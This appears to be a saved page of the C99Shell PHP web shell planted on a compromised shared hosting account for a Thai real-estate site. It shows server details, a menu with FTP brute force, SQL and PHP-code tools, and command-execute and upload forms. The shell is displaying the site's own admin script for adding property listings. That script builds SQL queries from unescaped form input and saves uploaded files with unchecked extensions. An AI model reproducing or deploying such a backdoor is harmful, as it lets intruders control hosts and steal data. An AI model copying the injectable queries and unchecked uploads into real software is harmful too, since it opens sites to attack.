!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.86 GB of 981.82 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     product_add.php (21.12 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 

include 'index_IncludeAdmin.php'
$_SESSION['page'] = 'product.php';

if (
$_POST['product_Add']) {

    
$salesteam_id htmlspecialchars($_POST['salesteam_id'], ENT_QUOTES );
    
$floor_id htmlspecialchars($_POST['floor_id'], ENT_QUOTES );
    
$product_name htmlspecialchars($_POST['product_name'], ENT_QUOTES );
    
$product_owner htmlspecialchars($_POST['product_owner'], ENT_QUOTES );
    
$product_condition htmlspecialchars($_POST['product_condition'], ENT_QUOTES );
    
$product_code trim($_POST['product_code']);
    
$product_price trim($_POST['product_price']);
    
$product_rebate trim($_POST['product_rebate']);
    
$product_charges trim($_POST['product_charges']);
    
$product_detail htmlspecialchars($_POST['product_detail'], ENT_QUOTES );
    
$product_link function_link($_POST['product_link']);
    
$product_review function_review($_POST['product_review']);
    
$product_bedroom trim($_POST['product_bedroom']);
    
$product_bathroom trim($_POST['product_bathroom']);
    
$product_area trim($_POST['product_area']);
    
$product_estate trim($_POST['product_estate']);
    
$product_estate_rai trim($_POST['product_estate_rai']);
    
$product_estate_ngan trim($_POST['product_estate_ngan']);
    
$product_estate_wa trim($_POST['product_estate_wa']);
    
$market_id trim($_POST['market_id']);
    
$product_status_id trim($_POST['product_status_id']);
    
$catalog_id trim($_POST['catalog_id']);
    
$trainstation_id trim($_POST['trainstation_id']);
    
$province_id trim($_POST['province_id']);
    
$amphure_id trim($_POST['amphure_id']);

    
$product_web_id trim($_POST['product_web_id']);
    
$district_id trim($_POST['district_id']);

    
$stationbts_id trim($_POST['stationbts_id']);
    
$stationmrt_id trim($_POST['stationmrt_id']);
    
$stationairport_id trim($_POST['stationairport_id']);

    
$product_construction trim($_POST['product_construction']);
    
$product_googlemaps trim($_POST['product_googlemaps']);
    
$product_zone trim($_POST['product_zone']);
    
$neighborhood_name trim($_POST['neighborhood_name']);


    
$product_page rand();

    
$plot_name " ";
    for(
$i=0;$i<count($_POST["plot_name"]);$i++){
        if(
trim($_POST["plot_name"][$i]) != ""){
            
$plot_name .= $_POST["plot_name"][$i];
            if (
$i<count($_POST["plot_name"])-1) {
                
$plot_name .= " , ";
            }

        }
    }
    
$features_name " ";
    for(
$i=0;$i<count($_POST["features_name"]);$i++){
        if(
trim($_POST["features_name"][$i]) != ""){
            
$features_name .= $_POST["features_name"][$i];
            if (
$i<count($_POST["features_name"])-1) {
                
$features_name .= " , ";
            }

        }
    }    

    
$product_search " ";
    
$product_search .= $product_datetime;
    
$product_search .= $plot_name;
    
$product_search .= $product_owner;
    
$product_search .= $product_condition;
    
$product_search .= $product_page;
    
$product_search .= $product_zone;
    
$product_search .= $features_name;
    
$product_search .= $product_code;
    
$product_search .= $product_bedroom;
    
$product_search .= $product_bathroom;
    
$product_search .= $product_area;
    
$product_search .= $product_estate;
    
$product_search .= $product_name;
    
$product_search .= $product_detail;
    
$product_search .= $product_price;
    
$product_search .= $product_charges;
    
$product_search .= $product_link;
    
$product_search .= $product_review;
    
$search str_replace(" ","",$product_search);
    
$product_search .= $search;

    
$product_Add "INSERT INTO product (product_web_id,product_code,salesteam_id,product_zone,neighborhood_name,product_googlemaps,stationbts_id,stationmrt_id,stationairport_id,product_construction,product_owner,product_condition,product_search,product_page,features_name,plot_name,district_id,amphure_id,province_id,market_id,product_status_id,catalog_id,floor_id,trainstation_id,product_bedroom,product_bathroom,product_area,product_estate,product_estate_rai,product_estate_ngan,product_estate_wa,product_name,product_price,product_rebate,product_charges,product_detail,product_link,product_review,product_datetime) 
    VALUES ('
$product_web_id','$product_code','$salesteam_id','$product_zone','$neighborhood_name','$product_googlemaps','$stationbts_id','$stationmrt_id','$stationairport_id','$product_construction','$product_owner','$product_condition','$product_search','$product_page','$features_name','$plot_name','$district_id','$amphure_id','$province_id','$market_id','$product_status_id','$catalog_id','$floor_id','$trainstation_id','$product_bedroom','$product_bathroom','$product_area','$product_estate','$product_estate_rai','$product_estate_ngan','$product_estate_wa','$product_name','$product_price','$product_rebate','$product_charges','$product_detail','$product_link','$product_review', NOW()) ";

    
$product_Reult mysqli_query($con,$product_Add);
    
$_SESSION[product_id] = mysqli_insert_id($con);

    if (
$product_Reult) {
        if(
$_FILES['product_photo']['name']!=''){
            
$suffix strrchr($_FILES["product_photo"]["name"],".");
            
$product_photo rand().$suffix;
            
$upload move_uploaded_file($_FILES["product_photo"]["tmp_name"],"../Files/product_photo/".$product_photo);
            
$product_photo_Update "UPDATE `product` SET `product_photo` = '$product_photo' WHERE `product_id` = '$_SESSION[product_id]'";
            
$product_photo_Reult mysqli_query($con,$product_photo_Update);
            
            
$foldername =  'product_photo';
            
min_resize($product_photo,$foldername);
        }
        if(isset(
$_FILES['product_picture_photo']['name'])&&$_FILES['product_picture_photo']['name']!=''){
            
$Count count($_FILES['product_picture_photo']['name']);
            for (
$i=0$i $Count$i++) { 
                
$Jpg strrchr($_FILES["product_picture_photo"]["name"][$i],".");
                
$product_picture_photo rand().rand().$Jpg;
                if(
move_uploaded_file($_FILES["product_picture_photo"]["tmp_name"][$i],"../Files/product_picture_photo/".$product_picture_photo)){
                    
$product_picture_Add "INSERT INTO product_picture (product_id,product_picture_photo) VALUES ('$_SESSION[product_id]','$product_picture_photo')";
                    
$product_picture_Reult mysqli_query($con,$product_picture_Add);
                    if (!
$product_picture_Reult) {
                        echo
"<script>alert('Error product_picture'); window.history.back(); </script>";
                    }
                }
            }
        }
        echo
"<script>  window.location='product_one.php?INSERT'; </script>";
    }
    else{
        echo
"<script>alert('เกิดข้อผิดพลาด'); window.history.back(); </script>";
    }
}

?>

<!DOCTYPE html>
<html>
<head>
    <? include 'index_Head.php'?>
</head>
<body>
    <? include 'index_Navbar.php'?>    
    <div class="container-fluid">
        <div class="row">

            <div class="col-md-2" id="main-left">
                <div class="row">
                    <div class="col-md-12">
                        <? include 'index_AdminMenu.php'?>
                    </div>
                </div>
            </div>

            <div class="col-md-10">
                <div class="row">
                    <div class="col-md-12">
                        <h3>  เพิ่ม อสังหาริมทรัพย์  </h3>
                        <hr>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 br-margin2">
                        <a href="product.php" class="btn btn-primary"><span class="glyphicon glyphicon-step-backward"></span> กลับ </a>
                    </div>
                    <div class="col-md-12">
                        <form class="form-horizontal" method="post" encType="multipart/form-data">
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    กรอกรายละเอียด "อสังหาริมทรัพย์"  ที่ต้องการเพิ่ม
                                </div>
                                <div class="panel-body">
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > สำหรับ (สมาชิก , คนนอก) <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <select class="form-control"  name="product_web_id" required>
                                                <option value="">--</option>
                                                <?
                                                $product_web_SL 
" SELECT * FROM product_web  ORDER BY product_web_id ASC";
                                                
$product_web_QR     mysqli_query($con,$product_web_SL);
                                                while (
$product_web     mysqli_fetch_array($product_web_QR)) {
                                                    
?>
                                                    <option value="<?php echo $product_web[product_web_id]; ?>"><?php echo $product_web[product_web_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รูปภาพปกสังหาริมทัพย์  <span class="text-red"> * </span>  </label>
                                        <div class="col-md-6">
                                            <input type="file" class="form-control br2" name="product_photo"  required>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รูปภาพเพิ่มเติม  </label>
                                        <div class="col-md-6">
                                            <input type="file"  class="form-control" multiple="multiple" name="product_picture_photo[]">
                                        </div>
                                        <label class="control-label col-md-3 text-left" >
                                            สามารถเพิ่มได้ภายหลัง
                                        </label>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ชื่ออสังหาริมทัพย์  <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <textarea id="product_name" class="form-control" rows="2" name="product_name"  maxlength="250" placeholder="ชื่ออสังหาริมทัพย์  ความยาวไม่เกิน 250  ตัวอักษร"></textarea>
                                        </div>
                                        <label class="control-label col-md-2 text-left" > <span id="product_name_chars" class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var product_name = 250;
                                            $('#product_name').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = product_name-length;
                                                $('#product_name_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รหัสทรัพย์ <span class="text-red"> * </span>  </label>
                                        <div class="col-md-6">
                                            <input required type="text" class="form-control"   name="product_code"  placeholder="  " >
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ขาย & เช่า  <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <select class="form-control"  name="market_id" required>
                                                <option value="">--</option>
                                                <?
                                                $market_SL 
" SELECT * FROM market  ORDER BY market_id ASC";
                                                
$market_QR     mysqli_query($con,$market_SL);
                                                while (
$market     mysqli_fetch_array($market_QR)) {
                                                    
?>
                                                    <option value="<?php echo $market[market_id]; ?>"><?php echo $market[market_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > สถานะ <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <select class="form-control"  name="product_status_id" required>
                                                <?
                                                $product_status_SL 
" SELECT * FROM product_status  ORDER BY product_status_id ASC";
                                                
$product_status_QR     mysqli_query($con,$product_status_SL);
                                                while (
$product_status     mysqli_fetch_array($product_status_QR)) {
                                                    
?>
                                                    <option value="<?php echo $product_status[product_status_id]; ?>"><?php echo $product_status[product_status_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ราคา <span class="text-red"> * </span>  </label>
                                        <div class="col-md-3">
                                            <input required type="number"   class="form-control"  name="product_price" placeholder="เฉพาะตัวเลข">
                                        </div>
                                        <div class="col-md-3">
                                            <input type="text"   class="form-control"  name="product_charges" placeholder="รายละเอียดราคาเพิ่มเติม (ไม่จำเป็น)">
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ราคาที่ถูกขีด ราคาเดิม </label>
                                        <div class="col-md-3">
                                            <input type="number"  class="form-control"  name="product_rebate" placeholder="เฉพาะตัวเลข">
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ประเภทอสังหาฯ <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <select required class="form-control"  name="catalog_id" >
                                                <option value="">--</option>
                                                <?
                                                $catalog_SL 
" SELECT * FROM catalog  ORDER BY catalog_id ASC";
                                                
$catalog_QR     mysqli_query($con,$catalog_SL);
                                                while (
$catalog     mysqli_fetch_array($catalog_QR)) {
                                                    
?>
                                                    <option value="<?php echo $catalog[catalog_id]; ?>"><?php echo $catalog[catalog_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ชั้น <span class="text-red"> * </span> </label>
                                        <div class="col-md-6">
                                            <select required class="form-control"  name="floor_id" >
                                                <option value="">--</option>
                                                <?
                                                $floor_SL 
" SELECT * FROM floor  ORDER BY floor_id ASC";
                                                
$floor_QR     mysqli_query($con,$floor_SL);
                                                while (
$floor     mysqli_fetch_array($floor_QR)) {
                                                    
?>
                                                    <option value="<?php echo $floor[floor_id]; ?>"><?php echo $floor[floor_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group"> 
                                        <label class="control-label col-md-3" > โซนหรือถนน  </label>
                                        <div class="col-md-6">
                                            <input type="text"   class="form-control"  name="product_zone" placeholder=" โซนหรือถนน ">
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > บ้านเลขที่ </label>
                                        <div class="col-md-6">
                                            <textarea id="product_detail" class="form-control" rows="4" name="product_detail"  maxlength="150" placeholder="บ้านเลขที่"></textarea>
                                        </div>
                                        <label class="control-label col-md-2 text-left" > <span id="product_detail_chars"  class="text-muted">  </span>  </label>
                                        <script type="text/javascript">
                                            var product_detail = 150;
                                            $('#product_detail').keyup(function() {
                                                var length = $(this).val().length;
                                                var length = product_detail-length;
                                                $('#product_detail_chars').text(length);
                                            });
                                        </script>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" >   </label>
                                        <label class="control-label col-md-3  text-left" > ห้องนอน  </label>
                                        <label class="control-label col-md-3  text-left" > ห้องน้ำ  </label>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" >   </label>
                                        <div class="col-md-3">
                                            <input type="number" class="form-control"  name="product_bedroom" placeholder=" จำนวนห้องนอน ">
                                        </div>
                                        <div class="col-md-3">
                                            <input type="number" class="form-control"  name="product_bathroom" placeholder=" จำนวนห้องน้ำ ">
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > พื้นที่ใช้สอย  </label>
                                        <div class="col-md-3">
                                            <input type="text" class="form-control"  name="product_area" placeholder=" เช่น 170 ">
                                        </div>
                                        <label class="control-label col-md-3 text-left" >
                                            ตารางวา
                                        </label>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" >ทำเลที่ตั้ง  <span class="text-red"> * </span>  </label>
                                        <div class="col-md-2">
                                            <select required class="form-control"  name="province_id" onChange ="Listamphure(this.value)" >
                                                <option value="">จังหวัด</option>
                                                <?
                                                $province_SL 
" SELECT * FROM province  ORDER BY province_name ASC";
                                                
$province_QR     mysqli_query($con,$province_SL);
                                                while (
$province     mysqli_fetch_array($province_QR)) {
                                                    
?>
                                                    <option value="<?php echo $province[province_id]; ?>"><?php echo $province[province_name]; ?>  </option>
                                                    <?
                                                
}
                                                
?>
                                            </select>
                                        </div>
                                        <div class="col-md-2">
                                            <select class="form-control"  id="ddlamphure" name="amphure_id"  onChange ="Listdistrict(this.value)">
                                                <option value="">อำเภอ</option>
                                                <option value="">กรุณาเลือกจังหวัดก่อน</option>
                                            </select>
                                        </div>
                                        <div class="col-md-2">
                                            <select id="ddldistrict" name="district_id" class="form-control"  >
                                                <option value="">ตำบล</option>
                                                <option value="">กรุณาเลือกอำเภอก่อน</option>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > รายการแสดง </label>
                                        <div class="col-md-6">
                                            <?
                                            $plot_SL 
" SELECT * FROM plot  ORDER BY plot_id ASC";
                                            
$plot_QR     mysqli_query($con,$plot_SL);
                                            while (
$plot     mysqli_fetch_array($plot_QR)) {
                                                
?>
                                                <label class="checkbox-inline">
                                                    <input  name="plot_name[]" value="<?php echo $plot['plot_name'];?>" type="checkbox">
                                                    <?php echo $plot[plot_name]; ?>
                                                </label>
                                                <?
                                            
}
                                            
?>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > คุณสมบัติ </label>
                                        <div class="col-md-6">
                                            <?
                                            $features_SL 
" SELECT * FROM features  ORDER BY features_id ASC";
                                            
$features_QR     mysqli_query($con,$features_SL);
                                            while (
$features     mysqli_fetch_array($features_QR)) {
                                                
?>
                                                <label class="checkbox-inline">
                                                    <input  name="features_name[]" value="<?php echo $features['features_name'];?>" type="checkbox">
                                                    <?php echo $features[features_name]; ?>
                                                </label>
                                                <?
                                            
}
                                            
?>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > เดินทางไปบ้านหลังนี้  </label>
                                        <div class="col-md-6">
                                            <input type="text" class="form-control"  name="product_link" placeholder=" เดินทางไปบ้านหลังนี้ ">
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" >  Google Maps  </label>
                                        <div class="col-md-6">
                                            <textarea class="form-control" rows="5" id="comment" name="product_googlemaps" placeholder=" Embed a map "></textarea>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > เจ้าของทรัพย์ </label>
                                        <div class="col-md-6">
                                            <textarea id="product_owner" class="form-control" rows="4" name="product_owner" ></textarea>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" > ผู้ขาย </label>
                                        <div class="col-md-6">
                                            <textarea id="product_condition" class="form-control" rows="4" name="product_condition" ></textarea>
                                        </div>
                                    </div>
                                    <div class="form-group">
                                        <label class="control-label col-md-3" ></label>
                                        <div class="col-md-6">
                                            <button type="submit"  class="btn btn-success">
                                                <span class="glyphicon glyphicon-plus-sign"></span> ยืนยันการเพิ่ม
                                            </button>
                                            <input type="hidden" name="product_Add" value="x">
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="panel panel-default">
                                <div class="panel-heading">
                                    ข้อมูลทั้งหมด 
                                </div>
                                <div class="panel-body">
                                    <textarea class="ckeditor" name="product_review"></textarea>
                                    <button Type="submit"  class="btn btn-success top-margin2">
                                        <span class="glyphicon glyphicon-plus-sign"></span> ยืนยันการเพิ่ม
                                    </button>
                                </div>
                            </div>
                        </form>
                    </div>
                    <!-- 12 -->
                </div>
                <!-- row -->
            </div>
            <!-- 10 -->
        </div>
        <!-- row -->
    </div>
    <!-- container -->
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1354 ]--